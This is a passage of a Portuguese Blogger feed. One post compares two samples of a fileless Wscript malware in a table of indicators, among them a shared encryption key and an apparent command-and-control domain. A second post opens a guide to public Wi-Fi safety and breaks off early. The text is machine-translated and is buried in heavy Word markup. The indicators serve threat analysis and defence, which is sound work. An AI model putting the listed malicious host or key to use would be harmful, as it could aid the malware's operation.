  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;O
artigo está datado de julho de 2016 e o &lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;MS Mincho&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-font-family: &amp;quot;MS Mincho&amp;quot;; mso-bidi-language: AR-SA; mso-fareast-language: PT-BR;&quot;&gt;​​&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;PC Matic bloqueou a amostra em novembro de 2016, 4
meses depois.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
table.MsoTableGrid
 {mso-style-name:&quot;Tabela com grade&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 border:solid windowtext 1.0pt;
 mso-border-alt:solid windowtext .5pt;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-border-insideh:.5pt solid windowtext;
 mso-border-insidev:.5pt solid windowtext;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #D9D9D9; border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-border-insideh: .5pt solid windowtext; mso-border-insidev: .5pt solid windowtext; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 480;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;height: 36.25pt; mso-yfti-irow: 0;&quot;&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; height: 36.25pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; valign=&quot;top&quot; width=&quot;199&quot;&gt;
  &lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; height: 36.25pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Amostra de ponto de força&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; height: 36.25pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Amostra PC Matic&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style=&quot;height: 26.9pt; mso-yfti-irow: 1;&quot;&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; height: 26.9pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; width=&quot;199&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Encontro&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 26.9pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Julho de 2016&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 26.9pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Novembro de 2016&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style=&quot;height: 34.9pt; mso-yfti-irow: 2;&quot;&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; height: 34.9pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; width=&quot;199&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Mecanismo de script&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 34.9pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Wscript&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 34.9pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Wscript&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style=&quot;height: 35.85pt; mso-yfti-irow: 3;&quot;&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; height: 35.85pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; width=&quot;199&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Nome do arquivo de script&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 35.85pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;R3ak.tmp&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 35.85pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;OTTYUADAF&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style=&quot;height: 43.75pt; mso-yfti-irow: 4;&quot;&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; height: 43.75pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; width=&quot;199&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Chave de criptografia&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 43.75pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Gexwoaxor&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 43.75pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Gexwoaxor&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr style=&quot;height: 35.7pt; mso-yfti-irow: 5; mso-yfti-lastrow: yes;&quot;&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; height: 35.7pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.6pt;&quot; width=&quot;199&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;URL&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 35.7pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 35.7pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 149.65pt;&quot; width=&quot;200&quot;&gt;
  &lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;Hit.thincoachmd.com&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Nesses
quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave
de criptografia crítica &quot;gexywoaxor&quot; permaneceu inalterada.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;O fato de que uma nova chave
de criptografia não era necessária era um sinal de que este vírus tinha sucesso
na entrega da sua carga útil.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Os
ataques de script ou infecções sem arquivo estão aqui hoje.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;25% de todos os blocos de PC
Matic de malware estão no nível de script.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;De
forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o
lançamento de um arquivo mais tarde para ser executado.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Nesse caso, há um segundo ponto em que uma abordagem de placa
de arquivos / lista negra pode capturar e bloquear a intrusão.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;O problema é que nem todos os ataques de script soltam um
arquivo e isso representa um buraco de segurança no antivírus da sua empresa.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2017/07/normal-0-21-microsoftinternetexplorer4.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-1518130185720362841</guid><pubDate>Sat, 15 Jul 2017 02:53:00 +0000</pubDate><atom:updated>2017-07-14T23:53:27.578-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 14.0pt;&quot;&gt;Segurança
Wi-Fi quando viajando - Dicas e precauções a serem tomadas&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 14.0pt;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;A
segurança cibernética não é apenas proteger seu PC e dispositivos móveis dos
ataques de Trojans e Malware;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;É mais sobre a segurança de suas redes.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Você precisa proteger todas as partes da sua rede.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Um &lt;/span&gt;&lt;b&gt;Wi-Fi&lt;/b&gt;&lt;span class=&quot;notranslate&quot;&gt;
público gratuito e aberto geralmente traz um sorriso no rosto de todos, mas o
fato é que essas redes abertas de Wi-Fi públicas são altamente propensas a
ataques cibernéticos, especialmente quando você está viajando.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Existem vários perigos de usar um ponto de acesso Wi-Fi
público .&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Nesta publicação, aprenderemos sobre a
segurança Wi-Fi e algumas dicas e precauções a serem tomadas para acessar de
forma segura a Internet ao viajar.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Essas
maneiras simples protegerão sua rede dos ataques Wi-Fi em qualquer lugar.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAJVIuLhzBmEtS2H1rYmjGpaLguWToGzQbh8guuxKPgWAb9FIDp98IJCpFT_2rsHiSOwxXX21JlKjkqOo92ZlvuR_OkFEPIyHzVotfkpsobgVs6Vi-UtOpyZH-TJ9UkiNxGs-vRIhs3IY/s1600/Wi-Fi-security-when-Traveling.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;352&quot; data-original-width=&quot;500&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAJVIuLhzBmEtS2H1rYmjGpaLguWToGzQbh8guuxKPgWAb9FIDp98IJCpFT_2rsHiSOwxXX21JlKjkqOo92ZlvuR_OkFEPIyHzVotfkpsobgVs6Vi-UtOpyZH-TJ9UkiNxGs-vRIhs3IY/s1600/Wi-Fi-security-when-Traveling.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
